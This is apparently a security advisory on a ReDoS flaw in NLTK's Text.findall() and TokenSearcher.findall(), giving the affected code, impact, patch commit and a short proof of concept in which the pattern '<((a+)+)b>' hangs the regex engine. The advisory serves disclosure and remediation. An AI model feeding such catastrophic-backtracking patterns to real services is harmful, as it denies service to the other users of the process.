See how nltk compares to other vendors in security performance
Summary NLTK's Text.findall() and TokenSearcher.findall() methods accept user-supplied regular expressions and pass them to the Python re engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the nltk.text module and was resolved in a prior commit.
Affected Code nltk/text.py — TokenSearcher.findall() (line 255) / Text.findall() (line 620)
TokenSearcher.init builds an internal string by wrapping each token in angle brackets. The findall() method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:
python def findall(self, regexp): # Preprocessing does NOT prevent catastrophic backtracking regexp = re.sub(r"\s", "", regexp) regexp = re.sub(r"<", "(?:<(?:", regexp) regexp = re.sub(r">", ")>)", regexp) regexp = re.sub(r"(?<!\\)\.", "[^>]", regexp)
# User-controlled regexp executed with no timeout hits = re.findall(regexp, self.raw) The preprocessing transforms < and > angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.
Proof of Concept python import nltk import time
Token of 25 'a' characters produces self.raw = "<aaaaaaaaaaaaaaaaaaaaaaaa!>" The trailing '!' ensures no match, forcing full backtracking. text = nltk.Text(["a" 25 + "!"])
Pattern after transformation: < → (?:<(?: → )>) Becomes: (?:<(?:((a+)+)b)>) re.findall runs this against "<aaaaaaaaaaaaaaaaaaaaaaaa!>" — hangs.
start = time.time() text.findall(r"<((a+)+)b>") # Never returns
Impact Applications that expose Text.findall() to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.
Remediation This vulnerability was patched in commit d8e4753. Users should update to the patched version.
Credit Tool: Kira by Offgrid Security